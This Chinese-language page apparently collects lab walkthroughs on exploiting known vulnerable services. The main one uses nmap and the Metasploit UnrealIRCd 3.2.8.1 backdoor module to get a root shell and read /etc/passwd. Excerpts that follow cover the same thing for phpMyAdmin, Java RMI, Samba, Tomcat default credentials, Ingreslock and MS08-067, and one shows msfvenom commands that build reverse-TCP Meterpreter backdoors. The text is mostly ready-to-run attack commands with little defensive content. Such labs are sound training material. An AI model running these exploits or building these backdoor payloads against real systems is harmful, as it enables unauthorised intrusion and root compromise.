Metasploit溢出UnrealIRCd后门漏洞

利用UnrealIRCd后门漏洞,获取目标主机的root权限。

某些站点的UnrealIRCd,在DEBUG3_DOLOG_SYSTEM宏中包含外部引入的恶意代码,远程攻击者能够执行任意代码。

一、利用nmap工具扫描目标主机

1.1使用nmap命令对目标主机进行扫描。单击桌面空白处,右键菜单选择“在终端中打开”。

1.2在终端中输入命令“nmap –sV  192.168.1.3”,对目标主机进行端口扫描,发现开放6667端口,对应的服务为unreal ircd。

1.3在终端中输入命令“msfconsole”,启动MSF终端。

1.4在终端中输入命令“search unreal ircd”,搜索ircd的相关工具和攻击载荷。

1.5在终端中输入命令“use exploit/unix/irc/unreal_ircd_3281_backdoor”,启用漏洞利用模块, 提示符就会提示进入到该路径下。

1.6在终端中输入命令“show options”,查看需要设置的相关项,“yes”表示必须填写的参数。

1.7在终端中输入命令“set RHOST 192.168.1.3”,设置目标主机的IP地址。

1.8在终端中输入“exploit”, 开始向目标主机攻击,攻击成功后,建立shell会话。

1.9在终端中输入“whoami”,查看获得的权限为root,输入命令“cat /etc/passwd”,查看系统的帐号和密码。

时间: 2024-10-06 02:40:13

Metasploit溢出UnrealIRCd后门漏洞的相关文章

NOE77101固件后门漏洞分析

NOE77101固件后门漏洞分析 固件获取 最近学习vxworks固件的分析,尝试对noe77101固件的经典后门漏洞进行分析,就好比学习msf时练习经典的ms08-067一样.noe77101固件的下载地址在此. 拿到固件之后,unzip noe77101_OS.bin_.zip解压固件,得到FLASH0文件夹和一个commandList.lst文件,FLASH0的文件目录如下: 在flash0/wwwroot/conf/exec/目录下找到了NOE77101.bin文件,这应该就是我们要分析

Metasploit溢出phpMyAdmin漏洞

利用phpMyAdmin漏洞上传木马程序,获得webshell. CGI脚本没有正确处理请求参数,导致源代码泄露,允许远程攻击者在请求参数中插入执行命令. 一.利用nmap工具扫描目标主机 1.1使用nmap命令对目标主机进行扫描.单击桌面空白处,右键菜单选择"在终端中打开". 1.2在终端中输入命令"nmap –sV  192.168.1.3",对目标主机进行端口扫描,发现开放80端口. 1.3在浏览器地址栏中输入"http:\\192.168.1.3&

Metasploit溢出java RMI SERVER命令执行漏洞

利用java RMI SERVER命令执行漏洞,获得目标主机root权限. Java RMI Server的RMI注册表和RMI激活服务的默认配置存在安全漏洞,可被利用导致代码执行. 一.利用nmap工具扫描目标主机 1.1使用nmap命令对目标主机进行扫描.单击桌面空白处,右键菜单选择"在终端中打开". 1.2在终端中输入命令"nmap –sV  192.168.1.3",对目标主机进行端口扫描,发现开放1099端口. 1.3在终端中输入命令"msfco

Metasploit溢出samba提权漏洞

Samba是一套实现SMB(server messages block)协议,跨平台进行文件共享和打印共享服务的程序,samba的sambd默认配置在可写文件共享时,存在目录遍历漏洞,远程用户可以通过smbclient端使用一个对称命,创建一个包含..的目录遍历符的软连接 ,可以进行目录遍历以及访问任意文件. 一.利用nmap工具扫描目标主机 1.1使用nmap命令对目标主机进行扫描.单击桌面空白处,右键菜单选择"在终端中打开". 1.3在终端中输入命令"msfconsole

Metasploit溢出Tomcat管理台默认口令漏洞

利用Tomcat管理台默认口令漏洞,上传木马文件,获得目标主机webshell. Tomcat 管理台安装好后需要及时修改默认管理账户,并杜绝弱口令,成功登陆者可以部署任意web应用,包括webshell. 一.利用nmap工具扫描目标主机 1.1使用nmap命令对目标主机进行扫描.单击桌面空白处,右键菜单选择"在终端中打开". 1.2在终端中输入命令"nmap –sV  192.168.1.3",对目标主机进行端口扫描,发现开放8081端口并且运行着ApacheT

Metasploit之多种后门生成

本章节的后门有以下几种 windows    -->使用模块"windows/meterpreter/reverse_tcp" 命令:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.2.146 LPORT=44444 X >test.exe 参考"09-Metasploit之我的远程控制软件" linux      -->使用模块"linux/x86/meterprete

主机溢出提权漏洞分析

背景介绍公司内部服务器,上面有一简单的上传入口,刚入职的小伙伴在C盘根目录下有一个TXT文本文件,说权限设置的很低,除Administrator外,其他用户无法读取到内容,直接向安全工程师"墨者"发出挑战,让其测试. 实训目标1.掌握文件上传的技巧:2.掌握IIS中间件存在的畸形解析漏洞:3.了解Windows系统CMD命令执行:4.了解查看操作系统安全补丁情况:5.了解Windows操作系统的文件权限设置:6.了解操作系统的溢出漏洞的提权方式: 解题方向通过上传脚本文件,读取C盘下T

Ingreslock后门漏洞

利用telnet命令连接目标主机的1524端口,直接获取root权限. Ingreslock后门程序监听在1524端口,连接到1524端口就可以直接获得root权限, 经常被用于入侵一个暴露的服务器. 一. 利用nmap工具扫描目标主机 1.1 使用nmap命令对目标主机进行扫描.单击桌面空白处,右键菜单选择"在终端中打开". 1.2 在终端中输入命令"nmap –sV  192.168.1.3",对目标主机进行端口扫描,发现开放1524端口. 1.3 在终端中输入

利用metasploit攻击有ms8067漏洞的PC机过程

拓扑环境:2台虚拟机,一台Kali,另一台有ms08067漏洞的XP或2000或2003机器 msfconsole进入msf控制台 输入search ms0-067 找到相应模块 use exploit/windows/smb/ms08_067_netapi  使用相应模块 set PAYLOAD windows/meterpreter/reverse_tcp 设置反弹连接 show options 查看设置选项 set RHOST 192.168.80.XX 设置远程主机 set LHOST